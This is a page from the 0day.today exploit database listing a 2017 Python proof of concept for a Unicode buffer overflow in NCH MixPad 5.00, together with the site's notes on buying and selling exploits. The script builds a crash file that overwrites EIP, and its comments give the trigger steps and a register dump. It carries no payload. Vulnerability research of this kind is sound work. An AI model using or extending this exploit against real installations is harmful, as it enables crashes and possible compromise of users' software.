0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MixPad 5.00 - Buffer Overflow Exploit
#!/usr/bin/python # # Exploit Author: bzyo # Twitter: @bzyo_ # Exploit Title: NCH Software MixPad v5.00 - Unicode Buffer Overflow # Date: 21-01-2017 # Vulnerable Software: NCH Software MixPad # Vendor Homepage: http://www.nch.com.au/mixpad # Version: v5.00 # Software Link: http://www.nch.com.au/mixpad/mpsetup.exe # Tested On: Windows XP # # # PoC: generate crash.txt, options, metronome tab, paste crash.txt in 'choose a custom metronome sound' # # no unicode jmp/call to esp # # EAX 00117700 # ECX 001167F0 # EDX 7C90E514 ntdll.KiFastSystemCallRet # EBX 00000000 # ESP 00116C40 UNICODE "BBBBBB does not exist or cannot be accessed." # EBP 00116FAC # ESI 0000004E # EDI 00117740 # EIP 00CC00CC filename="crash.txt" junk = "A"*251 eip = "\xcc"*2 #eip over; jmp/call esp goes here fill = "B"*100 #only 6 used in esp buffer = junk + eip + fill textfile = open(filename , 'w') textfile.write(buffer) textfile.close() # 0day.today [2024-11-15] #